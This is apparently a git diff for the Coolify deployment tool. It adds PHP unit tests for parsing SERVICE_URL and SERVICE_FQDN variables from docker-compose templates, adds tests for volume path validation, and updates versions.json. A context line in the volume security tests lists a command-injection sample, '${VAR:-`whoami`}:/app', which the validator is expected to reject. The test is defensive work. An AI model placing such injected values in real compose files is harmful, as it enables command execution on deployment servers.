$envVarName->value(); + } + } + } + + $templateVariableNames = array_unique($templateVariableNames); + + expect($templateVariableNames)->toHaveCount(3); + expect($templateVariableNames)->toContain('SERVICE_URL_APP'); + expect($templateVariableNames)->toContain('SERVICE_URL_APP_3000'); + expect($templateVariableNames)->toContain('SERVICE_FQDN_API'); +}); + +it('removes duplicates from template variable names', function () { + $yaml = <<<'YAML' +services: + app: + environment: + - SERVICE_URL_APP + - PUBLIC_URL=${SERVICE_URL_APP} + - PRIVATE_URL=${SERVICE_URL_APP} +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.app'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $envVar) { + if (is_string($envVar)) { + $envVarName = str($envVar)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + if (is_string($envVar) && str($envVar)->contains('${')) { + preg_match_all('/\$\{(SERVICE_(?:FQDN|URL)_[^}]+)\}/', $envVar, $matches); + if (! empty($matches[1])) { + foreach ($matches[1] as $match) { + $templateVariableNames[] = $match; + } + } + } + } + + $templateVariableNames = array_unique($templateVariableNames); + + // SERVICE_URL_APP appears 3 times but should only be in array once + expect($templateVariableNames)->toHaveCount(1); + expect($templateVariableNames)->toContain('SERVICE_URL_APP'); +}); + +it('detects SERVICE_FQDN variables in addition to SERVICE_URL', function () { + $yaml = <<<'YAML' +services: + app: + environment: + - SERVICE_FQDN_APP + - SERVICE_FQDN_APP_3000 + - SERVICE_URL_APP + - SERVICE_URL_APP_8080 +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.app'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $envVar) { + if (is_string($envVar)) { + $envVarName = str($envVar)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + } + + expect($templateVariableNames)->toHaveCount(4); + expect($templateVariableNames)->toContain('SERVICE_FQDN_APP'); + expect($templateVariableNames)->toContain('SERVICE_FQDN_APP_3000'); + expect($templateVariableNames)->toContain('SERVICE_URL_APP'); + expect($templateVariableNames)->toContain('SERVICE_URL_APP_8080'); +}); + +it('handles abbreviated service names that differ from container names', function () { + // This is the actual OpenPanel case from GitHub issue #7243 + // Container name: openpanel-dashboard + // Template variable: SERVICE_URL_OPDASHBOARD (abbreviated) + + $containerName = 'openpanel-dashboard'; + $templateVariableName = 'SERVICE_URL_OPDASHBOARD'; + + // The old logic would generate this from container name: + $generatedFromContainer = 'SERVICE_URL_'.str($containerName)->upper()->replace('-', '_')->value(); + + // This shows the mismatch + expect($generatedFromContainer)->toBe('SERVICE_URL_OPENPANEL_DASHBOARD'); + expect($generatedFromContainer)->not->toBe($templateVariableName); + + // The template uses the abbreviated form + expect($templateVariableName)->toBe('SERVICE_URL_OPDASHBOARD'); +}); + +it('correctly identifies abbreviated variable patterns', function () { + $tests = [ + // Full name transformations (old logic) + ['container' => 'openpanel-dashboard', 'generated' => 'SERVICE_URL_OPENPANEL_DASHBOARD'], + ['container' => 'my-long-service', 'generated' => 'SERVICE_URL_MY_LONG_SERVICE'], + + // Abbreviated forms (template logic) + ['container' => 'openpanel-dashboard', 'template' => 'SERVICE_URL_OPDASHBOARD'], + ['container' => 'openpanel-api', 'template' => 'SERVICE_URL_OPAPI'], + ['container' => 'my-long-service', 'template' => 'SERVICE_URL_MLS'], + ]; + + foreach ($tests as $test) { + if (isset($test['generated'])) { + $generated = 'SERVICE_URL_'.str($test['container'])->upper()->replace('-', '_')->value(); + expect($generated)->toBe($test['generated']); + } + + if (isset($test['template'])) { + // Template abbreviations can't be generated from container name + // They must be parsed from the actual template + expect($test['template'])->toMatch('/^SERVICE_URL_[A-Z0-9_]+$/'); + } + } +}); + +it('verifies direct declarations are not confused with references', function () { + // Direct declarations should be detected + $directDeclaration = 'SERVICE_URL_APP'; + expect(str($directDeclaration)->startsWith('SERVICE_URL_'))->toBeTrue(); + expect(str($directDeclaration)->before('=')->value())->toBe('SERVICE_URL_APP'); + + // References should not be detected as declarations + $reference = 'NEXT_PUBLIC_URL=${SERVICE_URL_APP}'; + $varName = str($reference)->before('=')->trim(); + expect($varName->startsWith('SERVICE_URL_'))->toBeFalse(); + expect($varName->value())->toBe('NEXT_PUBLIC_URL'); +}); + +it('ensures updateCompose helper file has template parsing logic', function () { + $servicesFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/services.php'); + + // Check that the fix is in place + expect($servicesFile)->toContain('Extract SERVICE_URL and SERVICE_FQDN variable names from the compose template'); + expect($servicesFile)->toContain('to ensure we use the exact names defined in the template'); + expect($servicesFile)->toContain('$templateVariableNames'); + expect($servicesFile)->toContain('DIRECTLY DECLARED'); + expect($servicesFile)->toContain('not variables that are merely referenced from other services'); +}); + +it('verifies that service names are extracted to create both URL and FQDN pairs', function () { + $servicesFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/services.php'); + + // Verify the logic to create both pairs exists + expect($servicesFile)->toContain('create BOTH SERVICE_URL and SERVICE_FQDN pairs'); + expect($servicesFile)->toContain('ALWAYS create base pair'); + expect($servicesFile)->toContain('SERVICE_URL_{$serviceName}'); + expect($servicesFile)->toContain('SERVICE_FQDN_{$serviceName}'); +}); + +it('extracts service names correctly for pairing', function () { + // Simulate what the updateCompose function does + $templateVariableNames = [ + 'SERVICE_URL_OPDASHBOARD', + 'SERVICE_URL_OPDASHBOARD_3000', + 'SERVICE_URL_OPAPI', + ]; + + $serviceNamesToProcess = []; + foreach ($templateVariableNames as $templateVarName) { + $parsed = parseServiceEnvironmentVariable($templateVarName); + $serviceName = $parsed['service_name']; + + if (! isset($serviceNamesToProcess[$serviceName])) { + $serviceNamesToProcess[$serviceName] = [ + 'base' => $serviceName, + 'ports' => [], + ]; + } + + if ($parsed['has_port'] && $parsed['port']) { + $serviceNamesToProcess[$serviceName]['ports'][] = $parsed['port']; + } + } + + // Should extract 2 unique service names + expect($serviceNamesToProcess)->toHaveCount(2); + expect($serviceNamesToProcess)->toHaveKey('opdashboard'); + expect($serviceNamesToProcess)->toHaveKey('opapi'); + + // OPDASHBOARD should have port 3000 tracked + expect($serviceNamesToProcess['opdashboard']['ports'])->toContain('3000'); + + // OPAPI should have no ports + expect($serviceNamesToProcess['opapi']['ports'])->toBeEmpty(); +}); + +it('should create both URL and FQDN when only URL is in template', function () { + // Given: Template defines only SERVICE_URL_APP + $templateVar = 'SERVICE_URL_APP'; + + // When: Processing this variable + $parsed = parseServiceEnvironmentVariable($templateVar); + $serviceName = $parsed['service_name']; + + // Then: We should create both: + // - SERVICE_URL_APP (or SERVICE_URL_app depending on template) + // - SERVICE_FQDN_APP (or SERVICE_FQDN_app depending on template) + expect($serviceName)->toBe('app'); + + $urlKey = 'SERVICE_URL_'.str($serviceName)->upper(); + $fqdnKey = 'SERVICE_FQDN_'.str($serviceName)->upper(); + + expect($urlKey)->toBe('SERVICE_URL_APP'); + expect($fqdnKey)->toBe('SERVICE_FQDN_APP'); +}); + +it('should create both URL and FQDN when only FQDN is in template', function () { + // Given: Template defines only SERVICE_FQDN_DATABASE + $templateVar = 'SERVICE_FQDN_DATABASE'; + + // When: Processing this variable + $parsed = parseServiceEnvironmentVariable($templateVar); + $serviceName = $parsed['service_name']; + + // Then: We should create both: + // - SERVICE_URL_DATABASE (or SERVICE_URL_database depending on template) + // - SERVICE_FQDN_DATABASE (or SERVICE_FQDN_database depending on template) + expect($serviceName)->toBe('database'); + + $urlKey = 'SERVICE_URL_'.str($serviceName)->upper(); + $fqdnKey = 'SERVICE_FQDN_'.str($serviceName)->upper(); + + expect($urlKey)->toBe('SERVICE_URL_DATABASE'); + expect($fqdnKey)->toBe('SERVICE_FQDN_DATABASE'); +}); + +it('should create all 4 variables when port-specific variable is in template', function () { + // Given: Template defines SERVICE_URL_UMAMI_3000 + $templateVar = 'SERVICE_URL_UMAMI_3000'; + + // When: Processing this variable + $parsed = parseServiceEnvironmentVariable($templateVar); + $serviceName = $parsed['service_name']; + $port = $parsed['port']; + + // Then: We should create all 4: + // 1. SERVICE_URL_UMAMI (base) + // 2. SERVICE_FQDN_UMAMI (base) + // 3. SERVICE_URL_UMAMI_3000 (port-specific) + // 4. SERVICE_FQDN_UMAMI_3000 (port-specific) + + expect($serviceName)->toBe('umami'); + expect($port)->toBe('3000'); + + $serviceNameUpper = str($serviceName)->upper(); + $baseUrlKey = "SERVICE_URL_{$serviceNameUpper}"; + $baseFqdnKey = "SERVICE_FQDN_{$serviceNameUpper}"; + $portUrlKey = "SERVICE_URL_{$serviceNameUpper}_{$port}"; + $portFqdnKey = "SERVICE_FQDN_{$serviceNameUpper}_{$port}"; + + expect($baseUrlKey)->toBe('SERVICE_URL_UMAMI'); + expect($baseFqdnKey)->toBe('SERVICE_FQDN_UMAMI'); + expect($portUrlKey)->toBe('SERVICE_URL_UMAMI_3000'); + expect($portFqdnKey)->toBe('SERVICE_FQDN_UMAMI_3000'); +}); + +it('should handle multiple ports for same service', function () { + $templateVariableNames = [ + 'SERVICE_URL_API_3000', + 'SERVICE_URL_API_8080', + ]; + + $serviceNamesToProcess = []; + foreach ($templateVariableNames as $templateVarName) { + $parsed = parseServiceEnvironmentVariable($templateVarName); + $serviceName = $parsed['service_name']; + + if (! isset($serviceNamesToProcess[$serviceName])) { + $serviceNamesToProcess[$serviceName] = [ + 'base' => $serviceName, + 'ports' => [], + ]; + } + + if ($parsed['has_port'] && $parsed['port']) { + $serviceNamesToProcess[$serviceName]['ports'][] = $parsed['port']; + } + } + + // Should have one service with two ports + expect($serviceNamesToProcess)->toHaveCount(1); + expect($serviceNamesToProcess['api']['ports'])->toHaveCount(2); + expect($serviceNamesToProcess['api']['ports'])->toContain('3000'); + expect($serviceNamesToProcess['api']['ports'])->toContain('8080'); + + // Should create 6 variables total: + // 1. SERVICE_URL_API (base) + // 2. SERVICE_FQDN_API (base) + // 3. SERVICE_URL_API_3000 + // 4. SERVICE_FQDN_API_3000 + // 5. SERVICE_URL_API_8080 + // 6. SERVICE_FQDN_API_8080 +}); + +it('detects SERVICE_URL variables in map-style environment format', function () { + $yaml = <<<'YAML' +services: + trigger: + environment: + SERVICE_URL_TRIGGER_3000: "" + SERVICE_FQDN_DB: localhost + OTHER_VAR: value +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.trigger'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $key => $value) { + if (is_int($key) && is_string($value)) { + // List-style + $envVarName = str($value)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } elseif (is_string($key)) { + // Map-style + $envVarName = str($key); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + } + + expect($templateVariableNames)->toHaveCount(2); + expect($templateVariableNames)->toContain('SERVICE_URL_TRIGGER_3000'); + expect($templateVariableNames)->toContain('SERVICE_FQDN_DB'); + expect($templateVariableNames)->not->toContain('OTHER_VAR'); +}); + +it('handles multiple map-style SERVICE_URL and SERVICE_FQDN variables', function () { + $yaml = <<<'YAML' +services: + app: + environment: + SERVICE_URL_APP_3000: "" + SERVICE_FQDN_API: api.local + SERVICE_URL_WEB: "" + OTHER_VAR: value +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.app'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $key => $value) { + if (is_int($key) && is_string($value)) { + // List-style + $envVarName = str($value)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } elseif (is_string($key)) { + // Map-style + $envVarName = str($key); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + } + + expect($templateVariableNames)->toHaveCount(3); + expect($templateVariableNames)->toContain('SERVICE_URL_APP_3000'); + expect($templateVariableNames)->toContain('SERVICE_FQDN_API'); + expect($templateVariableNames)->toContain('SERVICE_URL_WEB'); + expect($templateVariableNames)->not->toContain('OTHER_VAR'); +}); + +it('does not detect SERVICE_URL references in map-style values', function () { + $yaml = <<<'YAML' +services: + app: + environment: + SERVICE_URL_APP_3000: "" + NEXT_PUBLIC_URL: ${SERVICE_URL_APP} + API_ENDPOINT: ${SERVICE_URL_API} +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.app'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $key => $value) { + if (is_int($key) && is_string($value)) { + // List-style + $envVarName = str($value)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } elseif (is_string($key)) { + // Map-style + $envVarName = str($key); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + } + + // Should only detect the direct declaration, not references in values + expect($templateVariableNames)->toHaveCount(1); + expect($templateVariableNames)->toContain('SERVICE_URL_APP_3000'); + expect($templateVariableNames)->not->toContain('SERVICE_URL_APP'); + expect($templateVariableNames)->not->toContain('SERVICE_URL_API'); + expect($templateVariableNames)->not->toContain('NEXT_PUBLIC_URL'); + expect($templateVariableNames)->not->toContain('API_ENDPOINT'); +}); + +it('handles map-style with abbreviated service names', function () { + // Simulating the langfuse.yaml case with map-style + $yaml = <<<'YAML' +services: + langfuse: + environment: + SERVICE_URL_LANGFUSE_3000: ${SERVICE_URL_LANGFUSE_3000} + DATABASE_URL: postgres://... +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.langfuse'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $key => $value) { + if (is_int($key) && is_string($value)) { + // List-style + $envVarName = str($value)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } elseif (is_string($key)) { + // Map-style + $envVarName = str($key); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + } + + expect($templateVariableNames)->toHaveCount(1); + expect($templateVariableNames)->toContain('SERVICE_URL_LANGFUSE_3000'); + expect($templateVariableNames)->not->toContain('DATABASE_URL'); +}); + +it('verifies updateCompose helper has dual-format handling', function () { + $servicesFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/services.php'); + + // Check that both formats are handled + expect($servicesFile)->toContain('is_int($key) && is_string($value)'); + expect($servicesFile)->toContain('List-style'); + expect($servicesFile)->toContain('elseif (is_string($key))'); + expect($servicesFile)->toContain('Map-style'); +}); diff --git a/tests/Unit/VolumeArrayFormatSecurityTest.php b/tests/Unit/VolumeArrayFormatSecurityTest.php index 97a6819b2..08174fff3 100644 --- a/tests/Unit/VolumeArrayFormatSecurityTest.php +++ b/tests/Unit/VolumeArrayFormatSecurityTest.php @@ -194,6 +194,36 @@ ->not->toThrow(Exception::class); }); +test('array-format with environment variable and path concatenation', function () { + // This is the reported issue #7127 - ${VAR}/path should be allowed + $dockerComposeYaml = <<<'YAML' +services: + web: + image: nginx + volumes: + - type: bind + source: '${VOLUMES_PATH}/mysql' + target: /var/lib/mysql + - type: bind + source: '${DATA_PATH}/config' + target: /etc/config + - type: bind + source: '${VOLUME_PATH}/app_data' + target: /app/data +YAML; + + $parsed = Yaml::parse($dockerComposeYaml); + + // Verify all three volumes have the correct source format + expect($parsed['services']['web']['volumes'][0]['source'])->toBe('${VOLUMES_PATH}/mysql'); + expect($parsed['services']['web']['volumes'][1]['source'])->toBe('${DATA_PATH}/config'); + expect($parsed['services']['web']['volumes'][2]['source'])->toBe('${VOLUME_PATH}/app_data'); + + // The validation should allow this - the reported bug was that it was blocked + expect(fn () => validateDockerComposeForInjection($dockerComposeYaml)) + ->not->toThrow(Exception::class); +}); + test('array-format with malicious environment variable default', function () { $dockerComposeYaml = <<<'YAML' services: diff --git a/tests/Unit/VolumeSecurityTest.php b/tests/Unit/VolumeSecurityTest.php index d7f20fc0e..f4cd6c268 100644 --- a/tests/Unit/VolumeSecurityTest.php +++ b/tests/Unit/VolumeSecurityTest.php @@ -94,6 +94,27 @@ } }); +test('parseDockerVolumeString accepts environment variables with path concatenation', function () { + $volumes = [ + '${VOLUMES_PATH}/mysql:/var/lib/mysql', + '${DATA_PATH}/config:/etc/config', + '${VOLUME_PATH}/app_data:/app', + '${MY_VAR_123}/deep/nested/path:/data', + '${VAR}/path:/app', + '${VAR}_suffix:/app', + '${VAR}-suffix:/app', + '${VAR}.ext:/app', + '${VOLUMES_PATH}/mysql:/var/lib/mysql:ro', + '${DATA_PATH}/config:/etc/config:rw', + ]; + + foreach ($volumes as $volume) { + $result = parseDockerVolumeString($volume); + expect($result)->toBeArray(); + expect($result['source'])->not->toBeNull(); + } +}); + test('parseDockerVolumeString rejects environment variables with command injection in default', function () { $maliciousVolumes = [ '${VAR:-`whoami`}:/app', diff --git a/versions.json b/versions.json index a83b4c8ce..577fdfe18 100644 --- a/versions.json +++ b/versions.json @@ -1,19 +1,29 @@ { "coolify": { "v4": { - "version": "4.0.0-beta.442" + "version": "4.0.0-beta.452" }, "nightly": { - "version": "4.0.0-beta.443" + "version": "4.0.0-beta.453" }, "helper": { - "version": "1.0.11" + "version": "1.0.12" }, "realtime": { "version": "1.0.10" }, "sentinel": { - "version": "0.0.16" + "version": "0.0.18" } + }, + "traefik": { + "v3.6": "3.6.1", + "v3.5": "3.5.6", + "v3.4": "3.4.5", + "v3.3": "3.3.7", + "v3.2": "3.2.5", + "v3.1": "3.1.7", + "v3.0": "3.0.4", + "v2.11": "2.11.31" } } \ No newline at end of file